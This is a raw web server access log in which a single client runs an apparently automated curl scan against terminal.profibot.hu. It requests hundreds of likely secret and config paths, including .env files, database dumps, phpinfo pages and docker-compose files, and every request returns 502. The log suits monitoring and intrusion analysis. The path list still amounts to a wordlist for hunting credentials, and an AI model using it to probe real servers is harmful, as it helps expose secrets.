terminal.profibot.hu "/counterblockd/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/counterwallet/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/cp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/cronlab/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/cryo_project/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/css/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/custom/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/d/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/i.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:51 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/info.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/test.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/data/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/database/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dataset1/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dataset2/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/db-admin/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/db.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/db.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/db_backup.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view.html" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view?panel=config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/default/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/delivery/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/demo-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/demo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dep.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/deploy.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/deploy/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/deployment-config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dev-api/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dev-env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dev.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dev/.env.local" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dev_env/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/developer.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/developer/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/developerslv/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/development/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/devs.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/devtools" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/directories/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dist/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:52 +0000] - - 502 - GET https terminal.profibot.hu "/dist/js/app.[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/django-blog/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/django/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/django_project_path/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/doc/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose/platform/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker-elk/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker-network-healthcheck/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker-node-mongo-redis/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/compose/withMongo/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/compose/withPostgres/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/database/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/db/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/dev/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/examples/compose/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/postgres/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docker/webdav/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/docs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/dodoswap-client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/dotfiles/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/download/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/downloads/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/drupal/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/dump.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/e2e/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/en/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/engine/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env.example" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env.save" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env.template" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env/dockers/mariadb-test/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env/dockers/php-apache/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env/example/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/env/template/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/environments/local/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/environments/production/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:53 +0000] - - 502 - GET https terminal.profibot.hu "/envs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/error.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/error/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/errors/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/example/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/example02-golang-package/import-underscore/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/example27-how-to-load-env/sample01/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/example27-how-to-load-env/sample02/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/01-simple-model/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/02-complex-example/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/03-one-to-many-relationship/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/04-many-to-many-relationship/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/05-migrations/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/06-base-service/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/07-feature-flags/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/08-performance/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/09-production/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/10-subscriptions/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/11-transactions/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/drupal-separate-services/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/react-dashboard/backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/sdl-first/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/sdl-first/prisma/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/vue-dashboard/backend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/web/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-cookie-auth-fauna/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-dotenv/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-firebase-authentication-serverless/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-react-relay-network-modern/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-relay-modern/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/examples/with-universal-configuration-build-time/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/exapi/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/Exercise.Frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/Exercise.Frontend/train/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/export/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/fastlane/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/favicons/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:54 +0000] - - 502 - GET https terminal.profibot.hu "/favs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/FE/huey/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fedex/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fhir-api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/files/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fileserver/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/films/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/Final_Project/Airflow_Dag/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/Final_Project/kafka_twitter/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/Final_Project/StartingFile/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/finalVersion/lcomernbootcamp/projbackend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/firebase.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/first-network/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/FIRST_CONFIG/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fisdom/fisdom/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/blocks/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/fiber-debugger/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/flight/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fixtures/kitchensink/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/flask/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/flask_test_uploads/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fm/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/font-icons/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/fonts/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 